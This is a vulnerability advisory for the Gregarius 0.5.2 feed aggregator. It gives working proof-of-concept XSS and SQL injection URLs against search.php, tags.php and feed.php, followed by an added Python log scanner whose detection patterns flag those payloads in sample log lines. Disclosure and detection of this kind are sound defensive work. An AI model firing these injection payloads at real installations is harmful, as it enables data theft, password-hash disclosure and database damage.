Gregarius 0.5.2 XSS and SQL Injection Vulnerabilities

http://gregarius.net/
Gregarius is a web-based RSS/RDF/ATOM feed aggregator, designed to run on your web server, allowing you to access your news sources from wherever you want.

XSS in search.php:
search.php?rss_query=<script>alert(1)</script>&rss_query_match=exact

XSS in tags.php:
tags.php?tag=<script>alert(1)</script>

SQL Injection in feed.php:
feed.php?folder=3 and 1=1 UNION select title from item--

with magic_quotes=off:
SQL Injection in search.php:
search.php?rss_query=aa%')) UNION select null,null,null,null,null,null,null,null,null,null,null,title,null from item-- &rss_query_match=exact


On Gregarius 0.5.2 with PostgreSQL this can be used to damage or alter the database, and possibly to disclose local files because the $lang value passed to include is not properly sanitized; on an early 0.5.3 svn version it leads to disclosure of the admin password hash.
Further XSS and SQL injection issues exist in the admin section.

Fixed in latest 0.5.3 svn.
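As an added example (not part of this advisory or of Gregarius), a small Python log scanner that flags requests to the three scripts named above whose parameters carry the shapes of these PoCs: a script tag in rss_query or tag, and a non-numeric or UNION-bearing folder. The access-log lines are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed Apache combined-log lines (sample data, not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2006:10:01:02 +0000] "GET /gregarius/search.php?rss_query=%3Cscript%3Ealert(1)%3C/script%3E&rss_query_match=exact HTTP/1.1" 200 1234
10.0.0.6 - - [12/Mar/2006:10:01:05 +0000] "GET /gregarius/feed.php?folder=3%20and%201=1%20UNION%20select%20title%20from%20item-- HTTP/1.1" 200 2345
10.0.0.7 - - [12/Mar/2006:10:01:09 +0000] "GET /gregarius/tags.php?tag=linux HTTP/1.1" 200 456
10.0.0.8 - - [12/Mar/2006:10:02:00 +0000] "GET /gregarius/feed.php?folder=3 HTTP/1.1" 200 2345
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Scripts and parameters named in the advisory.
WATCHED = {"search.php": ["rss_query"], "tags.php": ["tag"], "feed.php": ["folder"]}
XSS_RE = re.compile(r"<\s*script|javascript:|\bon\w+\s*=", re.I)
SQLI_RE = re.compile(r"\bunion\b.*\bselect\b|--\s*$|'\)|\band\b\s+\d+=\d+", re.I)


def classify(script, name, value):
    """Return 'xss', 'sqli', 'malformed' or None for one decoded parameter value."""
    if script == "feed.php" and name == "folder":
        # folder is a numeric id; anything that is not digits is suspect
        if not value.isdigit():
            return "sqli" if SQLI_RE.search(value) else "malformed"
        return None
    if XSS_RE.search(value):
        return "xss"
    if SQLI_RE.search(value):
        return "sqli"
    return None


def scan_log(text):
    """Yield (client_ip, script, parameter, kind) for every suspicious request."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        script = parts.path.rsplit("/", 1)[-1]
        if script not in WATCHED:
            continue
        params = parse_qs(parts.query, keep_blank_values=True)
        for name in WATCHED[script]:
            for value in params.get(name, []):
                # parse_qs decoded once; decode again so %253C cannot hide a '<'
                kind = classify(script, name, unquote_plus(value))
                if kind:
                    findings.append((line.split()[0], script, name, kind))
    return findings
```

Running `scan_log(SAMPLE_LOG)` reports the search.php request as xss and the feed.php UNION request as sqli, while the plain tag lookup and the numeric folder id pass.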
